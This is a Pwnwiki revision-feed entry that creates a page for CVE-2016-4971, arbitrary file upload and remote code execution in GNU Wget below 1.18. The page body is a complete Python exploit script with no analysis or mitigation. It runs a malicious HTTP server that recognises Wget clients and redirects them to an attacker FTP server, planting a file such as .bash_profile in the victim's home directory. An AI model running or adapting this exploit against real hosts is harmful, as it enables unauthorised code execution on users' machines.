https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2016-4971_Wget%E5%B0%8F%E6%96%BC1.18_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
CVE-2016-4971 Wget小於1.18 任意文件上傳&遠程命令執行漏洞 - Revision history
2026-04-08T02:58:02Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2016-4971_Wget%E5%B0%8F%E6%96%BC1.18_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=1965&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2) # Original Exploit Author: Dawid Golunski # Exploit Author: liewehacksie # V..."
2021-04-30T14:26:28Z
<p>Created page with "==EXP== <pre> # Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2) # Original Exploit Author: Dawid Golunski # Exploit Author: liewehacksie # V..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)<br />
# Original Exploit Author: Dawid Golunski<br />
# Exploit Author: liewehacksie<br />
# Version: GNU Wget < 1.18 <br />
# CVE: CVE-2016-4971<br />
<br />
import http.server<br />
import socketserver<br />
import socket<br />
import sys<br />
<br />
class wgetExploit(http.server.SimpleHTTPRequestHandler):<br />
<br />
def do_GET(self):<br />
# This takes care of sending .wgetrc/.bash_profile/$file<br />
<br />
print("We have a volunteer requesting " + self.path + " by GET :)\n")<br />
if "Wget" not in self.headers.get('User-Agent'):<br />
print("But it's not a Wget :( \n")<br />
self.send_response(200)<br />
self.end_headers()<br />
self.wfile.write("Nothing to see here...")<br />
return<br />
<br />
self.send_response(301)<br />
print("Uploading " + str(FILE) + "via ftp redirect vuln. It should land in /home/ \n")<br />
new_path = 'ftp://anonymous@{}:{}/{}'.format(FTP_HOST, FTP_PORT, FILE)<br />
<br />
print("Sending redirect to %s \n"%(new_path))<br />
self.send_header('Location', new_path)<br />
self.end_headers()<br />
<br />
<br />
HTTP_LISTEN_IP = '192.168.72.2'<br />
HTTP_LISTEN_PORT = 80<br />
FTP_HOST = '192.168.72.4'<br />
FTP_PORT = 2121<br />
FILE = '.bash_profile'<br />
<br />
handler = socketserver.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)<br />
<br />
print("Ready? Is your FTP server running?")<br />
<br />
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
result = sock.connect_ex((FTP_HOST, FTP_PORT))<br />
if result == 0:<br />
print("FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT))<br />
else:<br />
print("FTP is down :( Exiting.")<br />
exit(1)<br />
<br />
print("Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT)<br />
<br />
handler.serve_forever()<br />
<br />
</pre></div>
Pwnwiki